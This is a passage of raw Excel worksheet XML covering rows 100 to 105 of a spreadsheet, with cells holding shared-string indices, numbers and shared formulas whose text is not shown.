      <c r="BZ100" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA100" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB100" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC100" s="85"/>
      <c r="CD100" s="85"/>
      <c r="CE100" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF100" s="85"/>
      <c r="CG100" s="85"/>
      <c r="CH100" s="85"/>
      <c r="CI100" s="85"/>
      <c r="CJ100" s="86"/>
      <c r="CK100" s="86"/>
      <c r="CL100" s="86"/>
      <c r="CM100" s="86">
        <v>0.0</v>
      </c>
      <c r="CN100" s="86"/>
      <c r="CO100" s="86"/>
      <c r="CP100" s="86"/>
      <c r="CQ100" s="86"/>
      <c r="CR100" s="86"/>
      <c r="CS100" s="86"/>
      <c r="CT100" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU100" s="88" t="s">
        <v>149</v>
      </c>
      <c r="CV100" s="88">
        <v>2.0</v>
      </c>
      <c r="CW100" s="88">
        <v>4.0</v>
      </c>
      <c r="CX100" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY100" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ100" s="88"/>
      <c r="DA100" s="88"/>
      <c r="DB100" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC100" s="88"/>
      <c r="DD100" s="88"/>
      <c r="DE100" s="88"/>
      <c r="DF100" s="88"/>
      <c r="DG100" s="89"/>
      <c r="DH100" s="89"/>
      <c r="DI100" s="89"/>
      <c r="DJ100" s="89">
        <v>0.0</v>
      </c>
      <c r="DK100" s="89"/>
      <c r="DL100" s="89"/>
      <c r="DM100" s="89"/>
      <c r="DN100" s="89"/>
      <c r="DO100" s="89"/>
      <c r="DP100" s="89"/>
      <c r="DQ100" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR100" s="91"/>
      <c r="DS100" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT100" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU100" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV100" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW100" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX100" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY100" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ100" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA100" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB100" s="74"/>
      <c r="EC100" s="74">
        <v>0.0</v>
      </c>
      <c r="ED100" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE100" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="101" ht="153.75" customHeight="1">
      <c r="B101" s="71" t="s">
        <v>397</v>
      </c>
      <c r="C101" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D101" s="72" t="s">
        <v>1020</v>
      </c>
      <c r="E101" s="72" t="s">
        <v>1061</v>
      </c>
      <c r="F101" s="72" t="s">
        <v>1062</v>
      </c>
      <c r="G101" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H101" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I101" s="73" t="s">
        <v>1063</v>
      </c>
      <c r="J101" s="73" t="s">
        <v>1064</v>
      </c>
      <c r="K101" s="73" t="s">
        <v>1065</v>
      </c>
      <c r="L101" s="74">
        <v>15.0</v>
      </c>
      <c r="M101" s="74">
        <v>1.0</v>
      </c>
      <c r="N101" s="74">
        <v>1.0</v>
      </c>
      <c r="O101" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P101" s="74">
        <v>1.0</v>
      </c>
      <c r="Q101" s="74">
        <v>0.0</v>
      </c>
      <c r="R101" s="169" t="s">
        <v>315</v>
      </c>
      <c r="S101" s="112" t="s">
        <v>1066</v>
      </c>
      <c r="T101" s="76" t="s">
        <v>1067</v>
      </c>
      <c r="U101" s="77" t="s">
        <v>1068</v>
      </c>
      <c r="V101" s="76" t="s">
        <v>191</v>
      </c>
      <c r="W101" s="109"/>
      <c r="X101" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y101" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z101" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA101" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB101" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC101" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD101" s="78">
        <v>402.0</v>
      </c>
      <c r="AE101" s="78">
        <v>1.0</v>
      </c>
      <c r="AF101" s="78">
        <v>3.0</v>
      </c>
      <c r="AG101" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH101" s="78">
        <v>402.0</v>
      </c>
      <c r="AI101" s="78"/>
      <c r="AJ101" s="78"/>
      <c r="AK101" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL101" s="78"/>
      <c r="AM101" s="78"/>
      <c r="AN101" s="78"/>
      <c r="AO101" s="78"/>
      <c r="AP101" s="80"/>
      <c r="AQ101" s="80"/>
      <c r="AR101" s="80"/>
      <c r="AS101" s="80">
        <v>0.0</v>
      </c>
      <c r="AT101" s="80"/>
      <c r="AU101" s="80"/>
      <c r="AV101" s="80"/>
      <c r="AW101" s="80"/>
      <c r="AX101" s="80"/>
      <c r="AY101" s="80"/>
      <c r="AZ101" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA101" s="82">
        <v>402.0</v>
      </c>
      <c r="BB101" s="82">
        <v>1.0</v>
      </c>
      <c r="BC101" s="82">
        <v>3.0</v>
      </c>
      <c r="BD101" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE101" s="82">
        <v>402.0</v>
      </c>
      <c r="BF101" s="82"/>
      <c r="BG101" s="82"/>
      <c r="BH101" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI101" s="82"/>
      <c r="BJ101" s="82"/>
      <c r="BK101" s="82"/>
      <c r="BL101" s="82"/>
      <c r="BM101" s="83"/>
      <c r="BN101" s="83"/>
      <c r="BO101" s="83"/>
      <c r="BP101" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ101" s="83"/>
      <c r="BR101" s="83"/>
      <c r="BS101" s="83"/>
      <c r="BT101" s="83"/>
      <c r="BU101" s="83"/>
      <c r="BV101" s="83"/>
      <c r="BW101" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX101" s="85" t="s">
        <v>1069</v>
      </c>
      <c r="BY101" s="85">
        <v>2.0</v>
      </c>
      <c r="BZ101" s="85">
        <v>10.0</v>
      </c>
      <c r="CA101" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB101" s="85" t="s">
        <v>1069</v>
      </c>
      <c r="CC101" s="85"/>
      <c r="CD101" s="85"/>
      <c r="CE101" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF101" s="85"/>
      <c r="CG101" s="85"/>
      <c r="CH101" s="85"/>
      <c r="CI101" s="85"/>
      <c r="CJ101" s="86"/>
      <c r="CK101" s="86"/>
      <c r="CL101" s="86"/>
      <c r="CM101" s="86">
        <v>0.0</v>
      </c>
      <c r="CN101" s="86"/>
      <c r="CO101" s="86"/>
      <c r="CP101" s="86"/>
      <c r="CQ101" s="86"/>
      <c r="CR101" s="86"/>
      <c r="CS101" s="86"/>
      <c r="CT101" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU101" s="88" t="s">
        <v>1070</v>
      </c>
      <c r="CV101" s="88">
        <v>8.0</v>
      </c>
      <c r="CW101" s="88">
        <v>24.0</v>
      </c>
      <c r="CX101" s="79" t="s">
        <v>792</v>
      </c>
      <c r="CY101" s="88" t="s">
        <v>1071</v>
      </c>
      <c r="CZ101" s="88"/>
      <c r="DA101" s="88"/>
      <c r="DB101" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC101" s="88"/>
      <c r="DD101" s="88"/>
      <c r="DE101" s="88"/>
      <c r="DF101" s="88"/>
      <c r="DG101" s="89"/>
      <c r="DH101" s="89"/>
      <c r="DI101" s="89"/>
      <c r="DJ101" s="89">
        <v>0.0</v>
      </c>
      <c r="DK101" s="89"/>
      <c r="DL101" s="89"/>
      <c r="DM101" s="89"/>
      <c r="DN101" s="89"/>
      <c r="DO101" s="89"/>
      <c r="DP101" s="89"/>
      <c r="DQ101" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR101" s="91"/>
      <c r="DS101" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT101" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU101" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV101" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW101" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX101" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY101" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ101" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA101" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB101" s="74"/>
      <c r="EC101" s="74">
        <v>0.0</v>
      </c>
      <c r="ED101" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE101" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="102" ht="153.75" customHeight="1">
      <c r="B102" s="71" t="s">
        <v>397</v>
      </c>
      <c r="C102" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D102" s="72" t="s">
        <v>1020</v>
      </c>
      <c r="E102" s="72" t="s">
        <v>1072</v>
      </c>
      <c r="F102" s="72" t="s">
        <v>1073</v>
      </c>
      <c r="G102" s="72" t="s">
        <v>1074</v>
      </c>
      <c r="H102" s="72" t="s">
        <v>1075</v>
      </c>
      <c r="I102" s="73" t="s">
        <v>1076</v>
      </c>
      <c r="J102" s="73" t="s">
        <v>1077</v>
      </c>
      <c r="K102" s="73" t="s">
        <v>1078</v>
      </c>
      <c r="L102" s="74"/>
      <c r="M102" s="74">
        <v>1.0</v>
      </c>
      <c r="N102" s="74">
        <v>1.0</v>
      </c>
      <c r="O102" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P102" s="74">
        <v>1.0</v>
      </c>
      <c r="Q102" s="74">
        <v>0.0</v>
      </c>
      <c r="R102" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S102" s="76" t="s">
        <v>1079</v>
      </c>
      <c r="T102" s="76" t="s">
        <v>1080</v>
      </c>
      <c r="U102" s="77" t="s">
        <v>1081</v>
      </c>
      <c r="V102" s="76" t="s">
        <v>191</v>
      </c>
      <c r="W102" s="109"/>
      <c r="X102" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y102" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z102" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA102" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB102" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC102" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD102" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE102" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF102" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG102" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH102" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI102" s="78"/>
      <c r="AJ102" s="78"/>
      <c r="AK102" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL102" s="78"/>
      <c r="AM102" s="78"/>
      <c r="AN102" s="78"/>
      <c r="AO102" s="78"/>
      <c r="AP102" s="80"/>
      <c r="AQ102" s="80"/>
      <c r="AR102" s="80"/>
      <c r="AS102" s="80">
        <v>0.0</v>
      </c>
      <c r="AT102" s="80"/>
      <c r="AU102" s="80"/>
      <c r="AV102" s="80"/>
      <c r="AW102" s="80"/>
      <c r="AX102" s="80"/>
      <c r="AY102" s="80"/>
      <c r="AZ102" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA102" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB102" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC102" s="82"/>
      <c r="BD102" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE102" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF102" s="82"/>
      <c r="BG102" s="82"/>
      <c r="BH102" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI102" s="82"/>
      <c r="BJ102" s="82"/>
      <c r="BK102" s="82"/>
      <c r="BL102" s="82"/>
      <c r="BM102" s="83"/>
      <c r="BN102" s="83"/>
      <c r="BO102" s="83"/>
      <c r="BP102" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ102" s="83"/>
      <c r="BR102" s="83"/>
      <c r="BS102" s="83"/>
      <c r="BT102" s="83"/>
      <c r="BU102" s="83"/>
      <c r="BV102" s="83"/>
      <c r="BW102" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX102" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY102" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ102" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA102" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB102" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC102" s="85"/>
      <c r="CD102" s="85"/>
      <c r="CE102" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF102" s="85"/>
      <c r="CG102" s="85"/>
      <c r="CH102" s="85"/>
      <c r="CI102" s="85"/>
      <c r="CJ102" s="86"/>
      <c r="CK102" s="86"/>
      <c r="CL102" s="86"/>
      <c r="CM102" s="86">
        <v>0.0</v>
      </c>
      <c r="CN102" s="86"/>
      <c r="CO102" s="86"/>
      <c r="CP102" s="86"/>
      <c r="CQ102" s="86"/>
      <c r="CR102" s="86"/>
      <c r="CS102" s="86"/>
      <c r="CT102" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU102" s="88" t="s">
        <v>149</v>
      </c>
      <c r="CV102" s="88">
        <v>2.0</v>
      </c>
      <c r="CW102" s="88">
        <v>2.0</v>
      </c>
      <c r="CX102" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY102" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ102" s="88"/>
      <c r="DA102" s="88"/>
      <c r="DB102" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC102" s="88"/>
      <c r="DD102" s="88"/>
      <c r="DE102" s="88"/>
      <c r="DF102" s="88"/>
      <c r="DG102" s="89"/>
      <c r="DH102" s="89"/>
      <c r="DI102" s="89"/>
      <c r="DJ102" s="89">
        <v>0.0</v>
      </c>
      <c r="DK102" s="89"/>
      <c r="DL102" s="89"/>
      <c r="DM102" s="89"/>
      <c r="DN102" s="89"/>
      <c r="DO102" s="89"/>
      <c r="DP102" s="89"/>
      <c r="DQ102" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR102" s="91"/>
      <c r="DS102" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT102" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU102" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV102" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW102" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX102" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY102" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ102" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA102" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB102" s="74"/>
      <c r="EC102" s="74">
        <v>0.0</v>
      </c>
      <c r="ED102" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE102" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="103" ht="153.75" customHeight="1">
      <c r="B103" s="71" t="s">
        <v>397</v>
      </c>
      <c r="C103" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D103" s="72" t="s">
        <v>1020</v>
      </c>
      <c r="E103" s="72" t="s">
        <v>1072</v>
      </c>
      <c r="F103" s="72" t="s">
        <v>1073</v>
      </c>
      <c r="G103" s="72" t="s">
        <v>1074</v>
      </c>
      <c r="H103" s="72" t="s">
        <v>1075</v>
      </c>
      <c r="I103" s="73" t="s">
        <v>1076</v>
      </c>
      <c r="J103" s="73" t="s">
        <v>1077</v>
      </c>
      <c r="K103" s="73" t="s">
        <v>1082</v>
      </c>
      <c r="L103" s="74"/>
      <c r="M103" s="74">
        <v>1.0</v>
      </c>
      <c r="N103" s="74">
        <v>1.0</v>
      </c>
      <c r="O103" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P103" s="74">
        <v>1.0</v>
      </c>
      <c r="Q103" s="74">
        <v>0.0</v>
      </c>
      <c r="R103" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S103" s="76" t="s">
        <v>1079</v>
      </c>
      <c r="T103" s="76" t="s">
        <v>1080</v>
      </c>
      <c r="U103" s="77" t="s">
        <v>1081</v>
      </c>
      <c r="V103" s="76" t="s">
        <v>191</v>
      </c>
      <c r="W103" s="109"/>
      <c r="X103" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y103" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z103" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA103" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB103" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC103" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD103" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE103" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF103" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG103" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH103" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI103" s="78"/>
      <c r="AJ103" s="78"/>
      <c r="AK103" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL103" s="78"/>
      <c r="AM103" s="78"/>
      <c r="AN103" s="78"/>
      <c r="AO103" s="78"/>
      <c r="AP103" s="80"/>
      <c r="AQ103" s="80"/>
      <c r="AR103" s="80"/>
      <c r="AS103" s="80">
        <v>0.0</v>
      </c>
      <c r="AT103" s="80"/>
      <c r="AU103" s="80"/>
      <c r="AV103" s="80"/>
      <c r="AW103" s="80"/>
      <c r="AX103" s="80"/>
      <c r="AY103" s="80"/>
      <c r="AZ103" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA103" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB103" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC103" s="82"/>
      <c r="BD103" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE103" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF103" s="82"/>
      <c r="BG103" s="82"/>
      <c r="BH103" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI103" s="82"/>
      <c r="BJ103" s="82"/>
      <c r="BK103" s="82"/>
      <c r="BL103" s="82"/>
      <c r="BM103" s="83"/>
      <c r="BN103" s="83"/>
      <c r="BO103" s="83"/>
      <c r="BP103" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ103" s="83"/>
      <c r="BR103" s="83"/>
      <c r="BS103" s="83"/>
      <c r="BT103" s="83"/>
      <c r="BU103" s="83"/>
      <c r="BV103" s="83"/>
      <c r="BW103" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX103" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY103" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ103" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA103" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB103" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC103" s="85"/>
      <c r="CD103" s="85"/>
      <c r="CE103" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF103" s="85"/>
      <c r="CG103" s="85"/>
      <c r="CH103" s="85"/>
      <c r="CI103" s="85"/>
      <c r="CJ103" s="86"/>
      <c r="CK103" s="86"/>
      <c r="CL103" s="86"/>
      <c r="CM103" s="86">
        <v>0.0</v>
      </c>
      <c r="CN103" s="86"/>
      <c r="CO103" s="86"/>
      <c r="CP103" s="86"/>
      <c r="CQ103" s="86"/>
      <c r="CR103" s="86"/>
      <c r="CS103" s="86"/>
      <c r="CT103" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU103" s="88" t="s">
        <v>149</v>
      </c>
      <c r="CV103" s="88">
        <v>2.0</v>
      </c>
      <c r="CW103" s="88">
        <v>2.0</v>
      </c>
      <c r="CX103" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY103" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ103" s="88"/>
      <c r="DA103" s="88"/>
      <c r="DB103" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC103" s="88"/>
      <c r="DD103" s="88"/>
      <c r="DE103" s="88"/>
      <c r="DF103" s="88"/>
      <c r="DG103" s="89"/>
      <c r="DH103" s="89"/>
      <c r="DI103" s="89"/>
      <c r="DJ103" s="89">
        <v>0.0</v>
      </c>
      <c r="DK103" s="89"/>
      <c r="DL103" s="89"/>
      <c r="DM103" s="89"/>
      <c r="DN103" s="89"/>
      <c r="DO103" s="89"/>
      <c r="DP103" s="89"/>
      <c r="DQ103" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR103" s="91"/>
      <c r="DS103" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT103" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU103" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV103" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW103" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX103" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY103" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ103" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA103" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB103" s="74"/>
      <c r="EC103" s="74">
        <v>0.0</v>
      </c>
      <c r="ED103" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE103" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="104" ht="153.75" customHeight="1">
      <c r="B104" s="71" t="s">
        <v>397</v>
      </c>
      <c r="C104" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D104" s="72" t="s">
        <v>1020</v>
      </c>
      <c r="E104" s="72" t="s">
        <v>1072</v>
      </c>
      <c r="F104" s="72" t="s">
        <v>1073</v>
      </c>
      <c r="G104" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H104" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I104" s="73" t="s">
        <v>1083</v>
      </c>
      <c r="J104" s="73" t="s">
        <v>690</v>
      </c>
      <c r="K104" s="73" t="s">
        <v>1084</v>
      </c>
      <c r="L104" s="74">
        <v>1358.0</v>
      </c>
      <c r="M104" s="74">
        <v>1.0</v>
      </c>
      <c r="N104" s="74">
        <v>1.0</v>
      </c>
      <c r="O104" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P104" s="74">
        <v>1.0</v>
      </c>
      <c r="Q104" s="74">
        <v>0.0</v>
      </c>
      <c r="R104" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S104" s="76" t="s">
        <v>1085</v>
      </c>
      <c r="T104" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U104" s="77" t="s">
        <v>1086</v>
      </c>
      <c r="V104" s="76" t="s">
        <v>1087</v>
      </c>
      <c r="W104" s="109"/>
      <c r="X104" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y104" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z104" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA104" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB104" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AC104" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD104" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE104" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF104" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG104" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH104" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI104" s="78"/>
      <c r="AJ104" s="78"/>
      <c r="AK104" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL104" s="78"/>
      <c r="AM104" s="78"/>
      <c r="AN104" s="78"/>
      <c r="AO104" s="78"/>
      <c r="AP104" s="80"/>
      <c r="AQ104" s="80"/>
      <c r="AR104" s="80"/>
      <c r="AS104" s="80">
        <v>0.0</v>
      </c>
      <c r="AT104" s="80"/>
      <c r="AU104" s="80"/>
      <c r="AV104" s="80"/>
      <c r="AW104" s="80"/>
      <c r="AX104" s="80"/>
      <c r="AY104" s="80"/>
      <c r="AZ104" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA104" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB104" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC104" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD104" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE104" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF104" s="82"/>
      <c r="BG104" s="82"/>
      <c r="BH104" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI104" s="82"/>
      <c r="BJ104" s="82"/>
      <c r="BK104" s="82"/>
      <c r="BL104" s="82"/>
      <c r="BM104" s="83"/>
      <c r="BN104" s="83"/>
      <c r="BO104" s="83"/>
      <c r="BP104" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ104" s="83"/>
      <c r="BR104" s="83"/>
      <c r="BS104" s="83"/>
      <c r="BT104" s="83"/>
      <c r="BU104" s="83"/>
      <c r="BV104" s="83"/>
      <c r="BW104" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX104" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY104" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ104" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA104" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB104" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC104" s="85"/>
      <c r="CD104" s="85"/>
      <c r="CE104" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF104" s="85"/>
      <c r="CG104" s="85"/>
      <c r="CH104" s="85"/>
      <c r="CI104" s="85"/>
      <c r="CJ104" s="86"/>
      <c r="CK104" s="86"/>
      <c r="CL104" s="86"/>
      <c r="CM104" s="86">
        <v>0.0</v>
      </c>
      <c r="CN104" s="86"/>
      <c r="CO104" s="86"/>
      <c r="CP104" s="86"/>
      <c r="CQ104" s="86"/>
      <c r="CR104" s="86"/>
      <c r="CS104" s="86"/>
      <c r="CT104" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU104" s="88" t="s">
        <v>1088</v>
      </c>
      <c r="CV104" s="88">
        <v>3.0</v>
      </c>
      <c r="CW104" s="88">
        <v>6.0</v>
      </c>
      <c r="CX104" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY104" s="88">
        <v>2101620.0</v>
      </c>
      <c r="CZ104" s="88"/>
      <c r="DA104" s="88"/>
      <c r="DB104" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC104" s="88"/>
      <c r="DD104" s="88"/>
      <c r="DE104" s="88"/>
      <c r="DF104" s="88"/>
      <c r="DG104" s="89"/>
      <c r="DH104" s="89"/>
      <c r="DI104" s="89"/>
      <c r="DJ104" s="89">
        <v>0.0</v>
      </c>
      <c r="DK104" s="89"/>
      <c r="DL104" s="89"/>
      <c r="DM104" s="89"/>
      <c r="DN104" s="89"/>
      <c r="DO104" s="89"/>
      <c r="DP104" s="89"/>
      <c r="DQ104" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR104" s="91"/>
      <c r="DS104" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT104" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU104" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV104" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW104" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX104" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY104" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ104" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA104" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB104" s="74"/>
      <c r="EC104" s="74">
        <v>0.0</v>
      </c>
      <c r="ED104" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE104" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="105" ht="153.75" customHeight="1">
      <c r="B105" s="71" t="s">
        <v>397</v>
      </c>
      <c r="C105" s="72" t="s">
        <v>12</v>
      </c>
